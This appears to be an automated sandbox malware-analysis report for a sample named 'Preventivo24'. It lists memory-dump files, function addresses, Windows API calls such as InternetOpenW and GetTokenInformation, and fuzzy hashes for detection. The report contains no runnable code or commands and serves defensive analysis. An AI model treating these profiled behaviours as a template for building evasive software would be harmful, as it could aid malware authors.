Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AddressCloseCreateHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedW
API String ID: 1765684683-2994018265
Opcode ID: 24a075f923908d878548abe4e86cf9857485d2b1595afc5af401c0bba34a9c77
Instruction ID: ea77e312487c095d9779c18bc840450b16ba8c3346e84c215ee9e4231d130c10
Opcode Fuzzy Hash: 24a075f923908d878548abe4e86cf9857485d2b1595afc5af401c0bba34a9c77
Instruction Fuzzy Hash: 4E316F72B44209EFDB248F55DC45FAABBB8FB05720F14412AF915EB380E775A840DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00FE1DC0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000002), ref: 00FE1DDD
GetWindowRect.USER32(00000000,?), ref: 00FE1DF3
ShowWindow.USER32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00FEBA1D), ref: 00FE1E08
InvalidateRect.USER32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00FEBA1D), ref: 00FE1E13
GetDlgItem.USER32(?,000003E9), ref: 00FE1E21
GetWindowRect.USER32(00000000,?), ref: 00FE1E37
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,00000000), ref: 00FE1E76

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Window$Rect$Item$InvalidateShow
String ID:
API String ID: 2147159307-0
Opcode ID: 4f3440c939e81dab1ca345998e5fae568a74453e3ab4ca7214ea2d309ed7629d
Instruction ID: 7f25a13d4222182b86856019936773ac833ea8047fd6e762460f8330ac4ee672
Opcode Fuzzy Hash: 4f3440c939e81dab1ca345998e5fae568a74453e3ab4ca7214ea2d309ed7629d
Instruction Fuzzy Hash: E8215E7160A701AFD314DF25DD49B6ABBE8FF89600F008629F459D2184EB70ED908B95

Uniqueness

Uniqueness Score: -1.00%

Function 00FFAA40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,00FF877A,00000000,B5580983,?,?,00000000), ref: 00FFAA4E
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,00FF877A,00000000,B5580983,?,?,00000000), ref: 00FFAA79
InternetOpenW.WININET(AdvancedInstaller,00000003,?,00000000,10000000), ref: 00FFAACF
GetLastError.KERNEL32(00FF877A,00000000,B5580983,?,?,00000000,?,?,?,?,?,01101115,000000FF,?,00FF81B2,?), ref: 00FFAAE3
InternetSetStatusCallbackW.WININET(00000000,00FFAB00), ref: 00FFAAF2

Strings

AdvancedInstaller, xrefs: 00FFAACA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CreateEventInternet$CallbackErrorLastOpenStatus
String ID: AdvancedInstaller
API String ID: 2592705480-1372594473
Opcode ID: 73f05fa66664e5369bafcbade3da57444a46083cba3825c390437a5a0094d531
Instruction ID: c6a173c4ebb6f78a5836faab8cafdafe478694d1656634ad502141dcacba23e2
Opcode Fuzzy Hash: 73f05fa66664e5369bafcbade3da57444a46083cba3825c390437a5a0094d531
Instruction Fuzzy Hash: E7218E75640308EFDB24EF21CE89F26BBA8EF45714F100069FA159B2DADB71E845CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00FE65E0 Relevance: 9.4, APIs: 6, Instructions: 447fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000,B5580983,00000000), ref: 00FE6647
GetLastError.KERNEL32 ref: 00FE697A
GetLastError.KERNEL32 ref: 00FE6A0A
GetLastError.KERNEL32 ref: 00FE6656

Part of subcall function 00FC0AF0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,B5580983,?,00000000), ref: 00FC0B3B
Part of subcall function 00FC0AF0: GetLastError.KERNEL32(?,00000000), ref: 00FC0B45

ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 00FE6769
ReadFile.KERNEL32(?,?,00000000,00000000,00000000,00000001), ref: 00FE67C0

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ErrorLast$File$Read$FormatMessagePointer
String ID:
API String ID: 3903527278-0
Opcode ID: 612692ce080c1aa1ecff72e396c94f2ba20863e63011d7ecc8b6483bbe480043
Instruction ID: 2a9e49ca06e4b97b54574e9c6c787e59a0f81a02b91af380802426c1831e8c55
Opcode Fuzzy Hash: 612692ce080c1aa1ecff72e396c94f2ba20863e63011d7ecc8b6483bbe480043
Instruction Fuzzy Hash: 4702B171D006499FDB04DFA9C945BADFBB5FF58320F148269E825E7381D734AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FE6B30 Relevance: 9.4, APIs: 6, Instructions: 364fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000,B5580983,00FE411D,?,00000007), ref: 00FE6B87
GetLastError.KERNEL32(?,00000007), ref: 00FE6E45
GetLastError.KERNEL32(?,00000007), ref: 00FE6F06
GetLastError.KERNEL32(?,00000007,?,?,?,?,?,?,?,?,00000000,010FDB42,000000FF,?,00FE587A), ref: 00FE6B96

Part of subcall function 00FC0AF0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,B5580983,?,00000000), ref: 00FC0B3B
Part of subcall function 00FC0AF0: GetLastError.KERNEL32(?,00000000), ref: 00FC0B45

ReadFile.KERNEL32(?,00000000,00000008,?,00000000,?,00000007), ref: 00FE6C5A
ReadFile.KERNEL32(?,80070057,00000000,00000000,00000000,00000001,?,00000007), ref: 00FE6CE9

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ErrorLast$File$Read$FormatMessagePointer
String ID:
API String ID: 3903527278-0
Opcode ID: 36e4cf7c1900bc2a1708afb038e657812ed347f5579dcdfb032a5be5e8e66032
Instruction ID: d2ed7ac6b5a0042b51f908696306389c20509fe1c98c3bcde98de310efa5e0c9
Opcode Fuzzy Hash: 36e4cf7c1900bc2a1708afb038e657812ed347f5579dcdfb032a5be5e8e66032
Instruction Fuzzy Hash: 5DE1DF71A00249DFDB14DFA8C984BAEB7B5FF18324F144169E815EB382DB34AD06DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FEBC30 Relevance: 9.1, APIs: 6, Instructions: 69threadsynchronizationCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0018AA80,0116001C,00000000,?), ref: 00FEBCAD
GetLastError.KERNEL32 ref: 00FEBCBA
WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 00FEBCE3
GetExitCodeThread.KERNEL32(00000000,?), ref: 00FEBCFD
TerminateThread.KERNEL32(00000000,00000000), ref: 00FEBD15
CloseHandle.KERNEL32(00000000), ref: 00FEBD1E

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleTerminateWait
String ID:
API String ID: 1566822279-0
Opcode ID: 29f6072510f20ff77f3fdde850fbedecb4d815e093d71fcb7f3ce2c03f5d9f43
Instruction ID: 96ba3770981519fdf60917e66ff1593fdbe0b2c9e7e3da2eb93b952e7a5fbe97
Opcode Fuzzy Hash: 29f6072510f20ff77f3fdde850fbedecb4d815e093d71fcb7f3ce2c03f5d9f43
Instruction Fuzzy Hash: B6312974900249DFDB24CF94CA09BEEBBF8FB08324F200669E920B62C0D7759A44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00FD9560 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 283COMMON

Download Yara Rule

APIs

Part of subcall function 01002440: GetUserNameW.ADVAPI32(?,?), ref: 010024BB
Part of subcall function 01002440: GetLastError.KERNEL32 ref: 010024C5
Part of subcall function 01002440: GetUserNameW.ADVAPI32(?,?), ref: 0100250D
Part of subcall function 01002440: GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 01002547
Part of subcall function 01002440: GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,-00000001,00000000), ref: 01002592

GetCurrentProcess.KERNEL32(00000008,?,?,?,?), ref: 00FD9875
OpenProcessToken.ADVAPI32(00000000), ref: 00FD987C
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00FD98AB
FindCloseChangeNotification.KERNEL32(00000000), ref: 00FD98C0

Strings

\/:*?"<>|, xrefs: 00FD9641

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: EnvironmentNameProcessTokenUserVariable$ChangeCloseCurrentErrorFindInformationLastNotificationOpen
String ID: \/:*?"<>|
API String ID: 4131070906-3830478854
Opcode ID: cbd959c47a13e45339c6e1c8b31610013dd2e4509d3cd2e561d66a752ea4e38b
Instruction ID: c9fb8705514f13f9c8fb59f34b1933aa1edb48be6af714f171b9a25920639785
Opcode Fuzzy Hash: cbd959c47a13e45339c6e1c8b31610013dd2e4509d3cd2e561d66a752ea4e38b
Instruction Fuzzy Hash: F2C1E030D04249CFCB14EFA8C9547EEBBB2BF15314F28425EE459AB381DBB46A44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FC8090 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 217COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(80004005,010BE245,B5580983,?,?,00000000,00000000,?,00000000,010BE245,000000FF,?,80004005,B5580983,?,00000000), ref: 00FC80F5
GetFileVersionInfoW.KERNELBASE(80004005,?,00000000,000000FF,00000000,?,?,00000000,00000000,?,00000000,010BE245,000000FF,?,80004005,B5580983), ref: 00FC8143

Strings

\StringFileInfo\%04x%04x\%s, xrefs: 00FC81BB
ProductName, xrefs: 00FC81B1
\VarFileInfo\Translation, xrefs: 00FC8185

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: FileInfoVersion$Size
String ID: ProductName$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
API String ID: 2104008232-2149928195
Opcode ID: ea3450d6ec64d0e96e1177034402d934eed68557a5ee610795bde2d56240f0d5
Instruction ID: bc9ec1e66fd87fb662efd7c64bcc7be4fb93acd1fe7b6444b76f528061798b43
Opcode Fuzzy Hash: ea3450d6ec64d0e96e1177034402d934eed68557a5ee610795bde2d56240f0d5
Instruction Fuzzy Hash: 1A71A031D0060ADFDB14DFA8C98ABEEBBB4EF04324F18416DE515A7291DB349D06DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01009BA0 Relevance: 7.7, APIs: 5, Instructions: 175threadsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,B5580983,00000000,?), ref: 01009BE0
CreateThread.KERNEL32(00000000,00000000,01009FB0,?,00000000,?), ref: 01009C30
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01009D56
GetExitCodeThread.KERNEL32(00000000,?), ref: 01009D61
CloseHandle.KERNEL32(00000000), ref: 01009D81

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CreateThread$AllocateCloseCodeEventExitHandleHeapObjectSingleWait
String ID:
API String ID: 978852114-0
Opcode ID: 95f6e65aa80727da2ce917fda1a978f7e109d86e6f38032b5f4d314cc42e4242
Instruction ID: 4d08cb5107fef162215f7e36d0d6d7a3f2f53da4a4ab924e8062817b4d063e67
Opcode Fuzzy Hash: 95f6e65aa80727da2ce917fda1a978f7e109d86e6f38032b5f4d314cc42e4242
Instruction Fuzzy Hash: 82615875A002189FDB19DF58C984BADBBF1FF48314F2541AAE919BB391D730A840CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FBD0C0 Relevance: 7.7, APIs: 5, Instructions: 174fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,?,01158488,00000001,B5580983,?,0000000A,?,00000000,010F66E5,000000FF), ref: 00FBD1D7
SetFileAttributesW.KERNEL32(?,00000000), ref: 00FBD1E8
GetFileAttributesW.KERNEL32(?,?,?,01158488,00000001,B5580983,?,0000000A,?,00000000,010F66E5,000000FF), ref: 00FBD1FB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00FBD20C
FindNextFileW.KERNEL32(?,?), ref: 00FBD25C

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$Attributes$FindNext
String ID:
API String ID: 3019667586-0
Opcode ID: a6be77c0a60afa46e48340a158527edd79580187e39882b12ba7eadcce8fab6f
Instruction ID: a7a74675fc8e3dc790dc7367ce89f8bb41d3fb5d0445cb304e3750c16765d55c
Opcode Fuzzy Hash: a6be77c0a60afa46e48340a158527edd79580187e39882b12ba7eadcce8fab6f
Instruction Fuzzy Hash: FF51AC30900689DBDB28EF69CD48BEDB7B4FF55320F048229E825972D0EB349A44DF41

Uniqueness

Uniqueness Score: -1.00%

Function 00FFC950 Relevance: 7.6, APIs: 5, Instructions: 69synchronizationnetworkCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983,?,00000000), ref: 00FFC963
InternetConnectW.WININET(00FFBB92,00FFBB92,00FFBB92,00FFBB92,00FFBB92,00FFBB92,00FFBB92), ref: 00FFC986
GetLastError.KERNEL32(?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983,?,00000000), ref: 00FFC990
WaitForSingleObject.KERNEL32(?,0000000A,?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983), ref: 00FFC9CA
SetEvent.KERNEL32(?,?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983,?,00000000), ref: 00FFC9F3

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Event$ConnectErrorInternetLastObjectResetSingleWait
String ID:
API String ID: 3866874665-0
Opcode ID: 78d9701caec0bb2fb665bae4371e2accd7d9b558d09660c285745d6843fedbd3
Instruction ID: 36a94c709ff5260c7140a89a502acbeb1663a53855365dd65e9f548a12a3e062
Opcode Fuzzy Hash: 78d9701caec0bb2fb665bae4371e2accd7d9b558d09660c285745d6843fedbd3
Instruction Fuzzy Hash: 2E11E93264075C8FD7308B15D688B27BF95EFA5335F00482EE183D2661C770E888E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FD9EB0 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 561COMMON

Download Yara Rule

Strings

\\?\, xrefs: 00FDA3EA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: FindResource
String ID: \\?\
API String ID: 1635176832-4282027825
Opcode ID: 587f6ae001d4bf7a74ece3c0c8492bb0f4725747aa841280689c529b9526b456
Instruction ID: 321fde570446afeaf6d4e02b0ddcbb847bbc3cc30f36f516f10f346a235146af
Opcode Fuzzy Hash: 587f6ae001d4bf7a74ece3c0c8492bb0f4725747aa841280689c529b9526b456
Instruction Fuzzy Hash: 7D32AC31E00609DFDB18DFA8C848BADB7B6BF44324F18421AE825A73D1DB74A945DF85

Uniqueness

Uniqueness Score: -1.00%

Function 00FBE650 Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjectsEx.USER32(00000001,000000FF,000000FF,000005FF,00000004), ref: 00FBE667
